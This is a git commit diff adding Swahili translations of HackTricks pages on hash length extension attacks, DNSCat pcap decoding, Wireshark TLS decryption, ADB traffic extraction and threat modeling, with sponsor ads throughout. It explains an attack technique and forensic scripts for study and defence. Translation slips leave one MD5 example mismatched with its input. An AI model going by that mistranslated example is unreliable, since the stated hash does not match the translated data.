Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

This commit is contained in:
Translator 2024-04-18 03:38:36 +00:00
parent e9803521e7
commit 6524ba67dd
34 changed files with 1851 additions and 1164 deletions

View file

@ -12,31 +12,44 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
# Muhtasari wa shambulio
Fikiria seva ambayo ina **kutilia sahihi** baadhi ya **data** kwa **kuongeza** **siri** kwa baadhi ya data wazi inayojulikana kisha kuhakiki data hiyo. Ikiwa unajua:
Fikiria server ambayo ina **kutilia saini** baadhi ya **data** kwa **kuongeza** **siri** kwa baadhi ya data ya wazi inayojulikana kisha kuhakiki data hiyo. Ikiwa unajua:
* **Urefu wa siri** (hii inaweza pia kufanywa kwa nguvu kutoka kwa safu ya urefu uliopewa)
* **Data wazi**
* **Urefu wa siri** (hii inaweza pia kufanywa kwa nguvu kutoka kwa safu ya urefu uliyopewa)
* **Data ya wazi**
* **Algoritimu (na ni dhaifu kwa shambulio hili)**
* **Kujaza inajulikana**
* Kawaida moja ya msingi hutumiwa, hivyo ikiwa mahitaji mengine 3 yanakidhiwa, hii pia inatumika
* Kawaida moja ya msingi hutumiwa, hivyo ikiwa mahitaji mengine 3 yanakidhiwa, hii pia ni
* Kujaza hubadilika kulingana na urefu wa siri+data, ndio maana urefu wa siri unahitajika
Basi, inawezekana kwa **mshambuliaji** kuongeza **data** na **kuzalisha** sahihi **kwa data iliyopita + data iliyongezwa**.
Basi, ni rahisi kwa **mshambuliaji** kuongeza **data** na **kuzalisha** saini halali kwa **data iliyopita + data iliyongezwa**.
## Vipi?
Kimsingi, algorithm dhaifu huzalisha hashes kwa kwanza **kutia sahihi kwa kundi la data**, na kisha, **kutoka** kwa **hash iliyoundwa awali** (hali), wan **ongeza kundi la data linalofuata** na **kulitia sahihi**.
Kimsingi, algorithm dhaifu huzalisha hashes kwa kwanza **kutia hash kibodi cha data**, na kisha, **kutoka** kwa **hash iliyoundwa awali** (hali), wan **ongeza kibodi ijayo cha data** na **kuitia hash**.
Kisha, fikiria kwamba siri ni "siri" na data ni "data", MD5 ya "secretdata" ni 6036708eba0d11f6ef52ad44e8b74d5b.\
Kisha, fikiria kwamba siri ni "siri" na data ni "data", MD5 ya "siridata" ni 6036708eba0d11f6ef52ad44e8b74d5b.\
Ikiwa mshambuliaji anataka kuongeza herufi "ongeza" anaweza:
* Kuzalisha MD5 ya "A" 64
* Badilisha hali ya hash iliyoundwa awali kuwa 6036708eba0d11f6ef52ad44e8b74d5b
* Kuongeza herufi "ongeza"
* Kumaliza hash na hash inayotokana itakuwa **sahihi kwa "siri" + "data" + "kujaza" + "ongeza"**
* Kumaliza hash na hash inayotokana itakuwa **halali kwa "siri" + "data" + "kujaza" + "ongeza"**
## **Zana**
@ -46,6 +59,17 @@ Ikiwa mshambuliaji anataka kuongeza herufi "ongeza" anaweza:
Unaweza kupata shambulio hili limeelezewa vizuri katika [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
@ -57,6 +81,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,21 +1,34 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
Ikiwa una pcap na data inayotumwa **kwa njia ya DNSCat** (bila kutumia encryption), unaweza kupata maudhui yaliyotumwa.
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
Unahitaji tu kujua kuwa **herufi 9 za kwanza** sio data halisi lakini zinahusiana na **mawasiliano ya C\&C**:
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
Ikiwa una pcap na data inayotolewa na **DNSCat** (bila kutumia encryption), unaweza kupata yaliyomo yaliyotolewa.
Unahitaji kujua kuwa **baiti 9 za kwanza** sio data halisi lakini zinahusiana na **mawasiliano ya C\&C**:
```python
from scapy.all import rdpcap, DNSQR, DNSRR
import struct
@ -34,24 +47,24 @@ last = qry
#print(f)
```
Kwa habari zaidi: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
Kwa maelezo zaidi: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
Kuna script ambayo inafanya kazi na Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
```
Kuna script inayofanya kazi na Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
```bash
python3 dnscat_decoder.py sample.pcap bad_domain
```
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -4,19 +4,33 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## Boresha ujuzi wako wa Wireshark
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}
---
## Boresha Ujuzi wako wa Wireshark
### Mafunzo
@ -29,7 +43,7 @@ Mafunzo yafuatayo ni mazuri kujifunza mbinu za msingi za kushangaza:
### Taarifa Zilizochambuliwa
**Taarifa za Wataalamu**
**Taarifa za Mtaalam**
Kwa kubonyeza _**Analyze** --> **Expert Information**_ utapata **muhtasari** wa kinachoendelea kwenye pakiti zilizochambuliwa:
@ -37,11 +51,11 @@ Kwa kubonyeza _**Analyze** --> **Expert Information**_ utapata **muhtasari** wa
**Anwani Zilizotatuliwa**
Chini ya _**Statistics --> Resolved Addresses**_ unaweza kupata taarifa kadhaa ambazo zilitatuliwa na wireshark kama vile bandari/usalama hadi itifaki, MAC hadi mtengenezaji, nk. Ni muhimu kujua ni nini kinahusika katika mawasiliano.
Chini ya _**Statistics --> Resolved Addresses**_ unaweza kupata taarifa kadhaa zilizotatuliwa na wireshark kama vile bandari/mtandao hadi itifaki, MAC hadi mtengenezaji, n.k. Ni muhimu kujua ni nini kinahusika katika mawasiliano.
![](<../../../.gitbook/assets/image (571).png>)
**Muundo wa Itifaki**
**Mfumo wa Itifaki**
Chini ya _**Statistics --> Protocol Hierarchy**_ unaweza kupata **itifaki** zinazohusika katika mawasiliano na data kuhusu hizo.
@ -55,7 +69,7 @@ Chini ya _**Statistics --> Conversations**_ unaweza kupata **muhtasari wa mazung
**Vipengele vya Mwisho**
Chini ya _**Statistics --> Endpoints**_ unaweza kupata **muhtasari wa vipengele vya mwisho** katika mawasiliano na data kuhusu kila kimoja.
Chini ya _**Statistics --> Endpoints**_ unaweza kupata **muhtasari wa vipengele vya mwisho** katika mawasiliano na data kuhusu kila moja.
![](<../../../.gitbook/assets/image (575).png>)
@ -67,13 +81,13 @@ Chini ya _**Statistics --> DNS**_ unaweza kupata takwimu kuhusu ombi la DNS lili
**Grafu ya I/O**
Chini ya _**Statistics --> I/O Graph**_ unaweza kupata **grafu ya mawasiliano**.
Chini ya _**Statistics --> I/O Graph**_ unaweza kupata **grafu ya mawasiliano.**
![](<../../../.gitbook/assets/image (574).png>)
### Vichujio
Hapa unaweza kupata vichujio vya wireshark kulingana na itifaki: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Hapa unaweza kupata kichujio cha wireshark kulingana na itifaki: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Vichujio vingine vya kuvutia:
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
@ -81,23 +95,23 @@ Vichujio vingine vya kuvutia:
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
* Trafiki ya HTTP na HTTPS ya awali + TCP SYN
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
* Trafiki ya HTTP na HTTPS ya awali + TCP SYN + ombi za DNS
* Trafiki ya HTTP na HTTPS ya awali + TCP SYN + Ombi za DNS
### Tafuta
Ikiwa unataka **kutafuta** **maudhui** ndani ya **pakiti** za vikao bonyeza _CTRL+f_. Unaweza kuongeza safu mpya kwenye mstari wa habari kuu (Nambari, Wakati, Chanzo, nk.) kwa kubonyeza kitufe cha kulia na kisha kuhariri safu.
Ikiwa unataka **tafuta** **maudhui** ndani ya **pakiti** za vikao bonyeza _CTRL+f_. Unaweza kuongeza safu mpya kwenye bar ya habari kuu (Namba, Wakati, Chanzo, n.k.) kwa kubonyeza kitufe cha kulia na kisha hariri safu.
### Maabara za pcap za bure
### Maabara za pcap za Bure
**Jifunze kwa vitendo na changamoto za bure za: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**
**Jifunze na changamoto za bure za: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**
## Kutambua Kikoa
## Kutambua Domains
Unaweza kuongeza safu inayoonyesha kichwa cha mwenyeji wa HTTP:
Unaweza kuongeza safu inayoonyesha Kichwa cha HTTP cha Mwenyeji:
![](<../../../.gitbook/assets/image (403).png>)
Na safu ambayo inaongeza jina la seva kutoka kwa uhusiano wa HTTPS unaosababisha (**ssl.handshake.type == 1**):
Na safu inayoongeza jina la Seva kutoka kwa muunganisho wa HTTPS wa kuanzisha (**ssl.handshake.type == 1**):
![](<../../../.gitbook/assets/image (408) (1).png>)
@ -105,7 +119,7 @@ Na safu ambayo inaongeza jina la seva kutoka kwa uhusiano wa HTTPS unaosababisha
### Kutoka kwa DHCP
Kwenye Wireshark ya sasa badala ya `bootp` unahitaji kutafuta `DHCP`
Katika Wireshark ya sasa badala ya `bootp` unahitaji kutafuta `DHCP`
![](<../../../.gitbook/assets/image (404).png>)
@ -117,29 +131,28 @@ Kwenye Wireshark ya sasa badala ya `bootp` unahitaji kutafuta `DHCP`
### Kufichua trafiki ya https na ufunguo binafsi wa seva
_edit>preference>protocol>ssl>_
_badilisha>mapendeleo>itifaki>ssl>_
![](<../../../.gitbook/assets/image (98).png>)
Bonyeza _Edit_ na ongeza data yote ya seva na ufunguo binafsi (_IP, Port, Itifaki, Faili ya ufunguo na nenosiri_)
Bonyeza _Hariri_ na ongeza data yote ya seva na ufunguo binafsi (_IP, Bandari, Itifaki, Faili ya Ufunguo na nenosiri_)
### Kufichua trafiki ya https na funguo za kikao za usawa
Firefox na Chrome zote zina uwezo wa kurekodi funguo za kikao za TLS, ambazo zinaweza kutumika na Wireshark kufichua trafiki ya TLS. Hii inaruhusu uchambuzi wa kina wa mawasiliano salama. Maelezo zaidi juu ya jinsi ya kufanya ufichuzi huu yanaweza kupatikana kwenye mwongozo kwenye [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
Firefox na Chrome zote zina uwezo wa kurekodi funguo za kikao za TLS, ambazo zinaweza kutumika na Wireshark kufichua trafiki ya TLS. Hii inaruhusu uchambuzi wa kina wa mawasiliano salama. Maelezo zaidi kuhusu jinsi ya kufanya ufichuzi huu yanaweza kupatikana kwenye mwongozo kwenye [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
Ili kugundua hii, tafuta ndani ya mazingira kwa kwenye kipengele cha `SSLKEYLOGFILE`
Ili kugundua hii, tafuta ndani ya mazingira kwa kivinjari `SSLKEYLOGFILE`
Faili ya funguo zilizoshirikiwa itaonekana kama hii:
Faili ya funguo za pamoja itaonekana kama hii:
![](<../../../.gitbook/assets/image (99).png>)
Ili kuimporti hii kwenye wireshark nenda kwa \_edit > preference > protocol > ssl > na iingize kwenye (Pre)-Master-Secret log filename:
Kuagiza hii kwenye wireshark enda kwa \_hariri > mapendeleo > itifaki > ssl > na iagize kwenye (Pre)-Master-Secret log filename:
![](<../../../.gitbook/assets/image (100).png>)
## Mawasiliano ya ADB
Changanua APK kutoka kwa mawasiliano ya ADB ambapo APK ilitumwa:
Chambua APK kutoka kwenye mawasiliano ya ADB ambapo APK ilitumwa:
```python
from scapy.all import *
@ -166,16 +179,28 @@ f = open('all_bytes.data', 'w+b')
f.write(all_bytes)
f.close()
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,36 +1,50 @@
# Uundaji wa Mfano wa Tishio
# Kufikiria Tishio
## Uundaji wa Mfano wa Tishio
## WhiteIntel
Karibu kwenye mwongozo kamili wa HackTricks juu ya Uundaji wa Mfano wa Tishio! Nenda kwenye uchunguzi wa sehemu muhimu ya usalama wa mtandao, ambapo tunatambua, kuelewa, na kuweka mkakati dhidi ya udhaifu wa uwezekano katika mfumo. Mfululizo huu ni mwongozo hatua kwa hatua uliojaa mifano halisi ya ulimwengu, programu muhimu, na maelezo rahisi kueleweka. Ni bora kwa wote wapya na wataalamu wenye uzoefu wanaotaka kuimarisha ulinzi wao wa usalama wa mtandao.
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Kufikiria Tishio
Karibu kwenye mwongozo kamili wa HackTricks kuhusu Kufikiria Tishio! Anza safari ya kuchunguza sehemu muhimu ya usalama wa mtandao, ambapo tunatambua, kuelewa, na kuweka mkakati dhidi ya udhaifu wa uwezekano katika mfumo. Mada hii inatumika kama mwongozo wa hatua kwa hatua uliojaa mifano halisi, programu inayofaa, na maelezo rahisi kueleweka. Ideal kwa wataalamu wa novice na wale wenye uzoefu wanaotaka kuimarisha ulinzi wao wa usalama wa mtandao.
### Matukio Yanayotumiwa Mara kwa Mara
1. **Uundaji wa Programu**: Kama sehemu ya Mzunguko wa Maisha wa Maendeleo ya Programu Salama (SSDLC), uundaji wa mfano wa tishio husaidia katika **utambuzi wa vyanzo vya uwezekano wa udhaifu** katika hatua za awali za maendeleo.
2. **Pentesting**: Mfumo wa Utekelezaji wa Upimaji wa Kuingilia (PTES) unahitaji **uundaji wa mfano wa tishio kuelewa udhaifu wa mfumo** kabla ya kufanya jaribio.
1. **Maendeleo ya Programu**: Kama sehemu ya Mzunguko wa Maendeleo Salama wa Programu (SSDLC), kufikiria tishio husaidia katika ** kutambua vyanzo vya uwezekano wa udhaifu ** katika hatua za mwanzo za maendeleo.
2. **Upimaji wa Kuingilia**: Mfumo wa Utekelezaji wa Upimaji wa Kuingilia (PTES) unahitaji **kufikiria tishio kuelewa udhaifu wa mfumo** kabla ya kutekeleza jaribio.
### Mfano wa Tishio kwa Ufupi
### Mfano wa Tishio kwa Kifupi
Mfano wa Tishio kwa kawaida unawakilishwa kama ramani, picha, au aina nyingine ya taswira inayoonyesha usanifu uliopangwa au ujenzi uliopo wa programu. Inafanana na **ramani ya mtiririko wa data**, lakini tofauti kuu iko katika muundo wake unaolenga usalama.
Mfano wa Tishio kawaida huonyeshwa kama ramani, picha, au aina nyingine ya mchoro wa kuonyesha usanidi uliopangwa au ujenzi uliopo wa programu. Inafanana na **ramani ya mtiririko wa data**, lakini tofauti kuu iko katika muundo wake unaolenga usalama.
Mifano ya tishio mara nyingi huonyesha vipengele vilivyowekwa alama kwa rangi nyekundu, ikionyesha udhaifu, hatari, au vizuizi vya uwezekano. Ili kuwezesha mchakato wa utambuzi wa hatari, triadi ya CIA (Uwazi, Uadilifu, Upatikanaji) hutumiwa, ikifanya msingi wa njia nyingi za uundaji wa mfano wa tishio, na STRIDE ikiwa moja ya njia za kawaida. Walakini, njia iliyochaguliwa inaweza kutofautiana kulingana na muktadha na mahitaji maalum.
Mifano ya tishio mara nyingi huonyesha vipengele vilivyowekwa kwa rangi nyekundu, ikimaanisha udhaifu, hatari, au vizuizi. Ili kusonga mchakato wa kutambua hatari, triadi ya CIA (Usiri, Uadilifu, Upatikanaji) hutumiwa, ikifanya msingi wa mbinu nyingi za kufikiria tishio, na STRIDE ikiwa moja ya kawaida zaidi. Walakini, mbinu iliyochaguliwa inaweza kutofautiana kulingana na muktadha na mahitaji maalum.
### Triadi ya CIA
Triadi ya CIA ni mfano unaotambuliwa sana katika uwanja wa usalama wa habari, ikimaanisha Uwazi, Uadilifu, na Upatikanaji. Nguzo hizi tatu hujenga msingi ambao hatua nyingi za usalama na sera zinaundwa, pamoja na njia za uundaji wa mfano wa tishio.
Triadi ya CIA ni mfano unaotambuliwa sana katika uga wa usalama wa habari, ikimaanisha Usiri, Uadilifu, na Upatikanaji. Nguzo hizi tatu hufanya msingi ambao hatua nyingi za usalama na sera zinajengwa, pamoja na mbinu za kufikiria tishio.
1. **Uwazi**: Kuhakikisha kuwa data au mfumo haufikiwi na watu wasio na idhini. Hii ni sehemu muhimu ya usalama, inahitaji udhibiti sahihi wa ufikiaji, encryption, na hatua zingine za kuzuia uvunjaji wa data.
2. **Uadilifu**: Uwiano, utulivu, na uaminifu wa data katika mzunguko wake wa maisha. Kanuni hii inahakikisha kuwa data haijabadilishwa au kuharibiwa na vyama visivyo na idhini. Mara nyingi inahusisha checksums, hashing, na njia zingine za uthibitisho wa data.
